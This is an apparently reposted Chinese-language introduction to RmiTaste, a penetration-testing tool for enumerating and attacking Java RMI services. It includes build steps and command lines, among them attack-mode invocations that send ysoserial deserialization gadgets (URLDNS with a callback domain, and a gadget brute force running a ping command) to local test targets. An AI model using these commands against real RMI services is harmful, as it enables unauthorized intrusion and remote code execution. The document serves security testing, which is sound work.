小编给大家分享一下RmiTaste是一款什么工具,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!
RmiTaste
RmiTaste可以帮助广大安全研究专家通过调用ysoserial实用工具所提供的远程方法来检测、枚举、交互和攻击RMI服务。除此之外,它还允许我们使用特定的参数来调用远程方法。
RmiTaste的主要目的是为了帮助安全专家识别目标系统中不安全的RMI服务,针对目标计算机系统未经授权的访问是一种违法行为,RmiTaste的使用必须要在合法场景下进行。
工具构建和运行
注意,本工具的运行需要OpenJDK v11.0.3。
首先,我们需要下载ysoserial-master-SNAPSHOT.jar,然后将其存储在libs_attack目录中,下载地址如下:
https://github.com/frohoff/ysoserial
第二步,使用maven构建项目代码:
mvn package
接下来,运行下列命令:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h __________ ._____________ __ /______ / _____ |__/__ ___/____ _______/ |_ ____ | _// /| | | | /__ / / ___// __// __ / | | / Y Y / | | | / __ /_/___ / | | / ___/ |____|_ /__|_| /__| |____| (____ /____ > |__| /___ > // // // // // @author Marcin Ogorzelski (mzero - @_mzer0) STM Solutions Warning: RmiTaste was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
工具使用
RmiTaste提供了四种运行模式,分别为连接、枚举、攻击和调用。每一种模式都提供了单独的帮助菜单:
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h (...) Usage: <main class> [-h] [COMMAND] -h, --help 显示这条帮助信息 Commands: conn 检测与主机的连接 enum 枚举RMI服务 attack 攻击RMI注册方法 call 调用RMI远程对象的特定方法
conn连接模式
conn连接模式允许我们判断目标端口是否为RMI服务端口:
# Check if 127.0.0.1:1099 is RMI Service java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099
enum枚举模式
enum枚举模式允许研究人员获取RMI服务的相关信息,比如说远程对象名以及远程对象实现和继承的类名。如果远程对象所实现的接口在RmiTaste类路径中可访问,那么RmiTaste将会打印出所有的远程方法,并支持我们直接调用:
# RMI service enumeration java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099
attack攻击模式
attack攻击模式允许使用ysoserial特定的实用工具链来调用远程方法。假设远程对象拥有下列方法:
acc1 [object] [127.0.1.1:38293] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method]
# Call all remote methods with URLDNS gadget as parameter java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"
"-gen bruteforce"选项还允许我们实现对远程方法的暴力破解:
# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1 java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"
call调用模式
call调用模式允许我们调用RMI远程对象的特定方法,假设远程对象拥有下列方法:
acc1 [object] [127.0.1.1:38293] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method]
# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"
# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234
工具使用样例
点击【这里】获取样本服务器。
首先,运行样本服务器。
接下来,进行对象枚举:
root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099 acc1 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] No methods found. I don't have remote object interface. Give it to me! acc2 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] No methods found. I don't have remote object interface. Give it to me!
大家可以看到,RmiTaste需要用到远程对象的接口。在渗透测试过程中,我们还需要去寻找这些接口。在这个样例中,我们只需要将rmitaste.examples-1.0-SNAPSHOT-all.jar拷贝到libs_attack目录中节课。枚举对象样例如下:
acc1 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method] acc2 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin(java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance(); [method] deposit(java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw(float param0); [method]
以上是“RmiTaste是一款什么工具”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注亿速云行业资讯频道!
原创文章,作者:745907710,如若转载,请注明出处:https://blog.ytso.com/221657.html